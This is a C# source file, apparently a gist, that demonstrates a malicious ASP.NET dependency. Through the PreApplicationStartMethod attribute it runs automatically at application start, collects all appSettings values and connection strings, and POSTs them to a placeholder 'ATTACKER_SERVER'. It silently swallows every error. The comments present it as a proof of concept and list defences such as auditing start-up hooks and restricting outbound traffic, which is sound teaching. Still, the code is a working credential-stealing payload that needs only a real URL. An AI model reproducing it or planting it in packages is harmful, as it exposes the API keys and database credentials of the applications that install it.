Dependencies being evil, part 1: hijacking appSettings and connectionStrings. A malicious dependency that is run by ASP.NET at application start (via PreApplicationStartMethod) and posts the host application's configuration secrets to a remote server, without the host ever calling into it.
using System; | |
using System.Configuration; | |
using System.Net.Http; | |
using System.Text; | |
using System.Threading.Tasks; | |
using System.Web; | |
using SecurityTrap.DoNotUse; | |
// Assembly-level trigger. ASP.NET (System.Web) looks for this attribute on the assemblies it
// loads and invokes the named public static method before the application starts, so the
// host never has to reference EvilCode: shipping this assembly as a dependency is enough for
// RogueAction to run. When auditing third-party packages, grep for this attribute (and other
// start-up hooks such as module initializers) - they execute with the web app's identity.
[assembly: PreApplicationStartMethod(typeof(EvilCode), "RogueAction")]
namespace SecurityTrap.DoNotUse
{
    /// <summary>
    /// Proof-of-concept of a malicious dependency. When this assembly is shipped with an
    /// ASP.NET application, <see cref="RogueAction"/> is invoked by the runtime (through the
    /// assembly-level PreApplicationStartMethod attribute) without the host ever calling into
    /// this type, and it sends the host's configuration secrets to a hard-coded server.
    /// Defences this illustrates the need for: keep secrets out of plain-text config
    /// (encrypted sections or an external secret store), review packages for start-up hooks,
    /// pin and verify dependency versions, and restrict outbound traffic from web servers.
    /// Do not use this in real code; it exists to show what a dependency is able to do.
    /// </summary>
    public static class EvilCode
    {
        /// <summary>
        /// Collects every appSettings entry and every connection string visible through
        /// ConfigurationManager (for an ASP.NET app that is normally web.config merged with
        /// machine.config) and POSTs them as plain text to a hard-coded URL. The method must
        /// be public, static and parameterless because of how PreApplicationStartMethod
        /// invokes it. Never throws: every failure is swallowed so the host starts normally.
        /// </summary>
        public static void RogueAction()
        {
            try
            {
                var sensitiveData = new StringBuilder();
                // One "key:value" line per appSettings entry - API keys and similar usually live here.
                foreach (var key in ConfigurationManager.AppSettings.AllKeys)
                    sensitiveData.AppendLine($"{key}:{ConfigurationManager.AppSettings[key]}");
                // One "name:connectionString" line per connection string - database credentials.
                for (int i = 0; i < ConfigurationManager.ConnectionStrings.Count; i++)
                    sensitiveData.AppendLine(
                        $"{ConfigurationManager.ConnectionStrings[i].Name}:{ConfigurationManager.ConnectionStrings[i].ConnectionString}");
                // Blocks application start-up until the upload completes or fails; the only
                // timeout is HttpClient's default, so an unreachable server delays the host's start.
                Task.WaitAll(MakeRequest(sensitiveData.ToString()));
            }
            catch
            {
                // Deliberately swallows everything, including the AggregateException that
                // Task.WaitAll raises when the request faults, so that the host application
                // starts as usual and nothing is logged. The silence is the point: a failed
                // exfiltration leaves no trace for the operator to notice.
            }
        }

        /// <summary>
        /// Posts <paramref name="value"/> as the request body to the attacker-controlled URL.
        /// "ATTACKER_SERVER" is a placeholder: as written it is not a valid absolute URI, so
        /// new Uri(...) throws UriFormatException and the caller's catch hides it - the gist
        /// only works once a real URL is substituted. The HttpClient is never disposed.
        /// </summary>
        /// <param name="value">The collected "key:value" lines, one per line.</param>
        /// <returns>The server's response; ignored by the caller.</returns>
        private static async Task<HttpResponseMessage> MakeRequest(string value)
        {
            var httpClient = new HttpClient();
            // No explicit encoding or content type: the secrets go out as text/plain.
            var content = new StringContent(value);
            return await httpClient.PostAsync(new Uri("ATTACKER_SERVER"), content);
        }
    }
}